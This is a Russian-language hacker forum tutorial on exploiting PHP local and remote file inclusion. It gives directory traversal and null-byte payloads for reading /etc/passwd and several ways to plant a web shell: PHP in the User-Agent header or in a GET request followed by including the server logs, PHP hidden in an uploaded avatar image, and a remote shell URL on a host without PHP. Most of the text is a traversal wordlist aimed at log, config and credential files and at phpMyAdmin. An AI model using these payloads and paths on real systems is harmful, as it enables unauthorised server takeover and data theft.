Сегодня я рассскажу особенности пхп-инклюда!!!На эту статью меня толкнул новичок спросивший что делать дальше, если добился вывода etc/passwd!Ща всем расскажу!
Вообще пхп-инклюд редко, где встречается, однако встречается!!!Она вызвана из-за недостаточной фильтрацией входных данных!!!!Т.е. мы можем переменную "юзать", как хотим!Есть пхп-локал\удаленный - инклуд!Бага воспринимает все как исходный текст, за исключением то, что <? ?> воспринимает, как пхп код!!!Т.е. если мы подгрузим xak.dadadqew где будет код в <? ?> то он выполниться!
Include('$_GET['dir']');
Error:
Include():warning
Include_once
Проверить уязвимый параметр можно, подставив не сущ. значение!И если вам выведет ошибку, то го проводить багу!
!Локальный!
php lfi(local file include)!Она позволяет нам подгружать локальные фаилы! Суть локального инклуда, подгружать локальные фаилы!Например /etc/passwd!
За частую, большенство людей на этом останавливаются, но мы научимся ее юзать!!!
Что и как{
../ - вверх в дир
..%05 - вверх в дир
%00 - обрезать все что после ядовитых нулей!
}
Например в localhost есть сценарий index.php и уязвимый параметр dir
Получается впринципе так: localhost/index.php?dir=../../etc/passwd и он вам прогрузит фаил, там обычно демоны, пользователи, за редким исключением пассы!!!Впринципе всё что добиваются большинства!!!Бывает такое, что сервер автоматом присваивает расширение!Это можно обойти, в конце фаила добавьте %00 и он обрежит!!!
ЗАЛИВКА ШЕЛЛА!
Вот тут много способов!
1: Заменить в заголовке user-agent на пхп-код(Я ЮЗАЮ LIVE http HEADERS аддон для мазилы!), и проинклюдить access_log (все стандартные пути внизу!), и у вас он выполниться!!!
2:Сделать ошибку в гет запросе!Например localhost/index.php?dir=321 <? phpinfo(); ?>
И проинклюдить error_log!
3:Мое любимое!
а)Сделать инъект пхп-кода в картинку, для этого я юзаю WINHEX!Просто в конце затираем FF D9 и вставляем пхп-код, там вывесится табличка, выбираем ancsii!Потом дописываем ff d9!!Если у тя осталось много места то сначало напиши 00 00 а потом FF D9
б)Найти куда залить фаил!Например:Зарегаться, и залить как аву!!
в)Проинклюдить ваш фаил!
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
php rfi(remote file include)!Самая ужастная бага!!!Позволяет удаленно подгружать фаилы!!!Просто найдите хостинг БЕЗ ПОДДЕРЖКИ ПХП, а то вы-то проинклудите, но ваш шелл будет выполняться на ваешм серве!!!Например narod.ru
залили!!!Пусть это будет xak.narod.ru/shell.php!!!Теперь просто присвавыете значение уязвимой переменной этот урл!!!И у вас появится шелл))))
Дефолтные нахождение, логов!
Код:
../../../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../../../var/log/httpd/error_log ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../apache/logs/error.log ../../../../apache/logs/access.log ../../../../../apache/logs/error.log ../../../../../apache/logs/access.log ../apache2/logs/error.log ../apache2/logs/access.log ../../apache2/logs/error.log ../../apache2/logs/access.log ../../../apache2/logs/error.log ../../../apache2/logs/access.log ../../../../apache2/logs/error.log ../../../../apache2/logs/access.log ../../../../../apache2/logs/error.log ../../../../../apache2/logs/access.log ../logs/error.log ../logs/access.log ../../logs/error.log ../../logs/access.log ../../../logs/error.log ../../../logs/access.log ../../../../logs/error.log ../../../../logs/access.log ../../../../../logs/error.log ../../../../../logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../usr/local/apache2/logs/access_log ../../../../../../../../../../usr/local/apache2/logs/access.log ../../../../../../../../../../usr/local/apache2/logs/error_log ../../../../../../../../../../usr/local/apache2/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/access.log ../../../../../../../../../../var/log/httpd/error_log ../../../../../../../../../../var/log/httpd/error.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/apache2/access_log ../../../../../../../../../../var/log/apache2/access.log ../../../../../../../../../../var/log/apache2/error_log ../../../../../../../../../../var/log/apache2/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/access.log ../../../../../../../../../../var/log/error_log ../../../../../../../../../../var/log/error.log ../../../../../../../../../../opt/lampp/logs/access_log ../../../../../../../../../../opt/lampp/logs/error_log ../../../../../../../../../../opt/xampp/logs/access_log ../../../../../../../../../../opt/xampp/logs/error_log ../../../../../../../../../../opt/lampp/logs/access.log ../../../../../../../../../../opt/lampp/logs/error.log ../../../../../../../../../../opt/xampp/logs/access.log ../../../../../../../../../../opt/xampp/logs/error.log ../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log ../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../apache/logs/error.log ../../../../apache/logs/access.log ../../../../../apache/logs/error.log ../../../../../apache/logs/access.log ../../../../../../apache/logs/error.log ../../../../../../apache/logs/access.log ../../../../../../../apache/logs/error.log ../../../../../../../apache/logs/access.log ../../../../../../../../apache/logs/error.log ../../../../../../../../apache/logs/access.log ../../../logs/error.log ../../../logs/access.log ../../../../logs/error.log ../../../../logs/access.log ../../../../../logs/error.log ../../../../../logs/access.log ../../../../../../logs/error.log ../../../../../../logs/access.log ../../../../../../../logs/error.log ../../../../../../../logs/access.log ../../../../../../../../logs/error.log ../../../../../../../../logs/access.log ../../../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../../../var/log/access_log ../../../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../../../var/log/access_log ../../../../../../../../../../../../var/log/error_log [/code:1:0472e27541] [b:0472e27541]conf[/b:0472e27541] [code:1:0472e27541] ../../../../../../usr/local/apache/conf/httpd.conf ../../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../../usr/local/etc/apache/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../../../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../../../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../../../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../../etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../../../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../../../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../../opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../../../private/etc/httpd/httpd.conf ../../../private/etc/httpd/httpd.conf.default ../../Volumes/webBackup/opt/apache2/conf/httpd.conf ../../Volumes/webBackup/private/etc/httpd/httpd.conf ../../Volumes/webBackup/private/etc/httpd/httpd.conf.default ../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf ../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf ../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf ../../../../../../../../../usr/local/php/httpd.conf.php ../../../../../../../../../usr/local/php4/httpd.conf.php ../../../../../../../../../usr/local/php5/httpd.conf.php ../../../../../../../../../usr/local/php/httpd.conf ../../../../../../../../../usr/local/php4/httpd.conf ../../../../../../../../../usr/local/php5/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php /usr/local/etc/apache/vhosts.conf [/code:1:0472e27541] [b:0472e27541]php.ini[/b:0472e27541] [code:1:0472e27541] ../../../../../../../../../etc/php.ini ../../../../../../../../../bin/php.ini ../../../../../../../../../etc/httpd/php.ini ../../../../../../../../../usr/lib/php.ini ../../../../../../../../../usr/lib/php/php.ini ../../../../../../../../../usr/local/etc/php.ini ../../../../../../../../../usr/local/lib/php.ini ../../../../../../../../../usr/local/php/lib/php.ini ../../../../../../../../../usr/local/php4/lib/php.ini ../../../../../../../../../usr/local/php5/lib/php.ini ../../../../../../../../../usr/local/apache/conf/php.ini ../../../../../../../../../etc/php4.4/fcgi/php.ini ../../../../../../../../../etc/php4/apache/php.ini ../../../../../../../../../etc/php4/apache2/php.ini ../../../../../../../../../etc/php5/apache/php.ini ../../../../../../../../../etc/php5/apache2/php.ini ../../../../../../../../../etc/php/php.ini ../../../../../../../../../etc/php/php4/php.ini ../../../../../../../../../etc/php/apache/php.ini ../../../../../../../../../etc/php/apache2/php.ini ../../../../../../../../../web/conf/php.ini ../../../../../../../../../usr/local/Zend/etc/php.ini ../../../../../../../../../opt/xampp/etc/php.ini ../../../../../../../../../var/local/www/conf/php.ini ../../../../../../../../../etc/php/cgi/php.ini ../../../../../../../../../etc/php4/cgi/php.ini ../../../../../../../../../etc/php5/cgi/php.ini ../../../../../../../../../php5\php.ini ../../../../../../../../../php4\php.ini ../../../../../../../../../php\php.ini ../../../../../../../../../PHP\php.ini ../../../../../../../../../WINDOWS\php.ini ../../../../../../../../../WINNT\php.ini ../../../../../../../../../apache\php\php.ini ../../../../../../../../../xampp\apache\bin\php.ini ../../../../../../../../../NetServer\bin\stable\apache\php.ini ../../../../../../../../../home2\bin\stable\apache\php.ini ../../../../../../../../../home\bin\stable\apache\php.ini ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini [/code:1:0472e27541] [b:0472e27541]MySQL: *log[/b:0472e27541] [code:1:0472e27541] /var/log/mysql/mysql-bin.log /var/log/mysql.log /var/log/mysqlderror.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/mysql.log [/code:1:0472e27541] [b:0472e27541]*conf[/b:0472e27541] [code:1:0472e27541] /var/lib/mysql/my.cnf /etc/mysql/my.cnf /etc/my.cnf [/code:1:0472e27541] [b:0472e27541]php my admin[/b:0472e27541] [code:1:0472e27541] /phpm/ /phpmy/ /phpmyadmin/ /PMA/ /mysql/ /admin/ /db/ /dbadmin/ /web/phpMyAdmin/ /admin/pma/ /admin/phpmyadmin/ /admin/mysql/ /phpmyadmin2/ /mysqladmin/ /mysql-admin/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /myadmin/ /phpMyA/ /phpmyad/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmi/ /phpMyAdmin1/ /phpMyAdmin2/ /phpMyAdmin-2/ /phpMyAdmin-2.10.0/ /phpMyAdmin-2.3.0/ /phpMyAdmin-2.3.1/ /phpMyAdmin-2.3.2/ /phpMyAdmin-2.3.3/ /phpMyAdmin-2.3.4/ /phpMyAdmin-2.3.5/ /phpMyAdmin-2.3.6/ /phpMyAdmin-2.3.7/ /phpMyAdmin-2.3.8/ /phpMyAdmin-2.3.9/ /phpMyAdmin-2.4.0/ /phpMyAdmin-2.4.1/ /phpMyAdmin-2.4.2/ /phpMyAdmin-2.4.3/ /phpMyAdmin-2.4.4/ /phpMyAdmin-2.4.5/ /phpMyAdmin-2.4.6/ /phpMyAdmin-2.4.7/ /phpMyAdmin-2.4.8/ /phpMyAdmin-2.4.9/ /phpMyAdmin-2.5.0/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.2/ /phpMyAdmin-2.5.3/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.8/ /phpMyAdmin-2.5.9/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.4/ /phpMyAdmin-2.6.5/ /phpMyAdmin-2.6.6/ /phpMyAdmin-2.6.7/ /phpMyAdmin-2.6.8/ /phpMyAdmin-2.6.9/ /phpMyAdmin-2.7.0/ /phpMyAdmin-2.7.1/ /phpMyAdmin-2.7.2/ /phpMyAdmin-2.7.3/ /phpMyAdmin-2.7.4/ /phpMyAdmin-2.7.5/ /phpMyAdmin-2.7.6/ /phpMyAdmin-2.7.7/ /phpMyAdmin-2.7.8/ /phpMyAdmin-2.7.9/ /phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /phpMyAdmin-2.8.3/ /phpMyAdmin-2.8.4/ /phpMyAdmin-2.8.5/ /phpMyAdmin-2.8.6/ /phpMyAdmin-2.8.7/ /phpMyAdmin-2.8.8/ /phpMyAdmin-2.8.9/ /phpMyAdmin-2.9.1/ /phpMyAdmin-2.9.2/ /phpMyAdmin-3/ /phpMyAdmin-4/ /phpMyAds/ /phpmyad-sys/[/code:1:0472e27541] [b:0472e27541]Cpanel[/b:0472e27541] [code:1:0472e27541] /usr/local/cpanel/logs /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log [/code:1:0472e27541] [code:1:0472e27541]/var/cpanel/cpanel.config[/code:1:0472e27541] [b:0472e27541]MySQL(Windows)[/b:0472e27541] [code:1:0472e27541] C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log C:\Program Files\MySQL\data\hostname.err C:\Program Files\MySQL\data\mysql.log C:\Program Files\MySQL\data\mysql.err C:\Program Files\MySQL\data\mysql-bin.log C:\MySQL\data\hostname.err C:\MySQL\data\mysql.log C:\MySQL\data\mysql.err C:\MySQL\data\mysql-bin.log [/code:1:0472e27541] [code:1:0472e27541] C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\my.cnf C:\MySQL\my.ini C:\MySQL\my.cnf[/code:1:0472e27541] [b:0472e27541]Mod Security[/b:0472e27541] [code:1:0472e27541]/usr/local/apache/logs/audit_log /logs/security_debug_log /logs/security_log[/code:1:0472e27541] [code:1:0472e27541]/usr/local/apache/conf/modsec.conf[/code:1:0472e27541] [b:0472e27541]ProFTPD[/b:0472e27541] [code:1:0472e27541] /etc/logrotate.d/proftpd /www/logs/proftpd.system.log /var/log/proftpd [/code:1:0472e27541] [code:1:0472e27541] /etc/proftp.conf /etc/protpd/proftpd.conf /etc/vhcs2/proftpd/proftpd.conf /etc/proftpd/modules.conf [/code:1:0472e27541] [b:0472e27541]vsftpd [/b:0472e27541] [code:1:0472e27541] /var/log/vsftpd.log /etc/vsftpd.chroot_list /etc/logrotate.d/vsftpd.log [/code:1:0472e27541] [code:1:0472e27541] /etc/vsftpd/vsftpd.conf /etc/vsftpd.conf /etc/chrootUsers [/code:1:0472e27541] [b:0472e27541]wu-ftpd [/b:0472e27541] [code:1:0472e27541] /var/log/xferlog /var/adm/log/xferlog [/code:1:0472e27541] [code:1:0472e27541] /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers [/code:1:0472e27541] [b:0472e27541]Pure-FTPd [/b:0472e27541] [code:1:0472e27541] /var/log/pure-ftpd/pure-ftpd.log /logs/pure-ftpd.log /var/log/pureftpd.log [/code:1:0472e27541] [code:1:0472e27541] /usr/sbin/pure-config.pl /usr/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.conf /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/sbin/pure-config.pl /usr/local/pureftpd/etc/pure-ftpd.conf -/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pureftpd.pdb /etc/pureftpd.passwd /etc/pure-ftpd/pureftpd.pdb DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/ OpenBSD: /usr/ports/net/pure-ftpd/ NetBSD: /usr/pkgsrc/net/pureftpd/ Crux Linux: /usr/ports/contrib/pure-ftpd/ [/code:1:0472e27541] [b:0472e27541]Exim[/b:0472e27541] [code:1:0472e27541] /var/log/exim_mainlog /var/log/exim/mainlog /var/log/maillog /var/log/exim_paniclog /var/log/exim/paniclog /var/log/exim/rejectlog /var/log/exim_rejectlog [/code:1:0472e27541] [b:0472e27541]Other[/b:0472e27541] [code:1:0472e27541] /var/log/ftp-proxy/ftp-proxy.log /var/log/ftp-proxy /var/log/ftplog /etc/logrotate.d/ftp /etc/ftpchroot /etc/ftphosts
